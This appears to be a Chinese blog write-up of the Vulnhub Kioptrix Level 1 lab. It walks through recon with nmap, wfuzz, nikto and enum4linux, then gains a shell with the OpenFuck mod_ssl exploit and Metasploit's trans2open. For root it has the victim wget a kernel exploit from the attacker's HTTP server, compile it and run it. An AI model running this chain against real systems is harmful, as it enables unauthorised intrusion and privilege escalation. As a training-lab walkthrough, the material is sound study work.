Kioptrix 1

0308

实验环境

攻击者:Kali 192.168.192.128

受害者 Kioptrix Level 1  IP未知

攻击者和受害者在同一网段

 

1. 信息收集

寻找靶机IP

nmap -sn 192.168.192.0/24

找到靶机IP为192.168.192.151

 

查看受害者服务详情

nmap -sV -A 192.168.192.151

屏幕截图 2024-02-15 131133

 

FUZZ模糊测试

export URL="http://192.168.192.151/FUZZ" 

#模糊测试目录 排除404网页
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"

#模糊测试文件 排除404网页
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"

没有让人感兴趣的目录

 

用nikto扫描一下

nikto -host=http://192.168.192.151

屏幕截图 2024-02-15 133326

这几个貌似有点用

 

最后用enum4linux看一下

enum4linux 192.168.192.151

 

2. 漏洞发现并利用 第一种方法

查看80端口服务

屏幕截图 2024-02-15 132047

Apache默认页面 没什么用

 

我们关注具体运行了那些服务

22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)

80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

111/tcp open rpcbind 2 (RPC #100000)

139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)

32768/tcp open status 1 (RPC #100024)

 

由nikto发现mod_ssl/2.8.4 lower are vulnerable to a remote buffer overflow which may allow a remote shell.

 

我们找一下有没有合适的shell

┌──(root㉿kali)-[~]
└─# searchsploit mod_ssl/2.8.4
Exploits: No Results
Shellcodes: No Results

找不到 尝试google一下 发现以下结果

屏幕截图 2024-02-15 133808

尝试找一下OpenFuck

searchsploit openfuck

屏幕截图 2024-02-15 134033

有了 我们选择最后一个

cp /usr/share/exploitdb/exploits/unix/remote/47080.c  /root/Desktop
gcc -o OpenFuck 47080.c -lcrypto

会报错 RC4等一些函数已经弃用 没关系 我们已经有了编译完成的结果

 

执行

./OpenFcuk

给了很多的target和Usage

屏幕截图 2024-02-15 134314

我们找符合靶机的OffSet

靶机的apache版本为1.3.20

./OpenFuck | grep 1.3.20

可以使用0x6b

./OpenFuck 0x6b 192.168.192.151

成功get到shell

屏幕截图 2024-02-15 134636

 

3. 漏洞发现并利用 第二种方法

我们看到linux上部署smb服务

我们尝试一下能不能从smb服务上入手

nmap -p139,445 --script=smb-vuln-* $IP

 

屏幕截图 2024-02-15 143235

psexec 漏洞

并且系统是Linux 我们使用trans2open

msfconsole -q

search trans2open

use 1

set RHOST 192.168.192.151

exploit

 

4. 后渗透阶段

建议使用的一些命令

cat /proc/cpu/cpuinfo    #查看CPU
file /bin/bash
/bin/bash: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped

ELF 32-bit LSB executalbe

uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

 

我们尝试一下能不能内核提权

searchsploit Linux 2.4 redhat

屏幕截图 2024-02-15 152741

cp /usr/share/exploitdb/exploits/linux/local/3.c  /root/Desktop
cp /root/Desktop
python -m httpserver 8089

 

受害者端

wget http://192.168.192.128:8089/3.c
gcc 3.c -o exploit
./exploit

屏幕截图 2024-02-15 153536

提权成功

 

 

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
Vulnhub
喜欢就支持一下吧
点赞8 分享
zhyann的头像-白鸢的笔记钻石会员
Active Directory Introduction and Enumeration 2-白鸢的笔记
Active Directory Introduction and Enumeration 2
Active Directory Introduction and Enumeration 2
1年前 182
winPEAS使用 利用有缺陷的注册表权限提权-白鸢的笔记
winPEAS使用 利用有缺陷的注册表权限提权
winPEAS使用 利用有缺陷的注册表权限提权
1年前 150
使用自动化脚本实现Linux信息收集工作-白鸢的笔记
使用自动化脚本实现Linux信息收集工作
使用自动化脚本实现Linux信息收集工作
2年前 138
NTLM认证-白鸢的笔记
NTLM认证
NTLM认证
11个月前 133
Exghost ftp爆破 curl上传-白鸢的笔记
Exghost ftp爆破 curl上传
Exghost ftp爆破 curl上传
11个月前 123
判断语句的嵌套-白鸢的笔记
判断语句的嵌套
判断语句的嵌套
2年前 118
相关推荐
DC-6-白鸢的笔记
DC-6
DC-6
1年前 95
w34kn3ss OpenSSL 0.9.8c-1 < 0.9.8g-9漏洞 python反编译-白鸢的笔记
w34kn3ss OpenSSL 0.9.8c-1 < 0.9.8g-9漏洞 python反编译
w34kn3ss OpenSSL 0.9.8c-1 < 0.9.8g-9漏洞 python反编译
10个月前 90
Vulnhub-DC2-白鸢的笔记
Vulnhub-DC2
Vulnhub-DC2
2年前 86
Symfonos:1 SMTP日志毒化-白鸢的笔记
Symfonos:1 SMTP日志毒化
Symfonos:1 SMTP日志毒化
10个月前 83
Vulnhub-DC1-白鸢的笔记
Vulnhub-DC1
Vulnhub-DC1
2年前 81
vulnhub Joy 网络枚举 ftp挂载-白鸢的笔记
vulnhub Joy 网络枚举 ftp挂载
vulnhub Joy 网络枚举 ftp挂载
10个月前 80
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][se][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片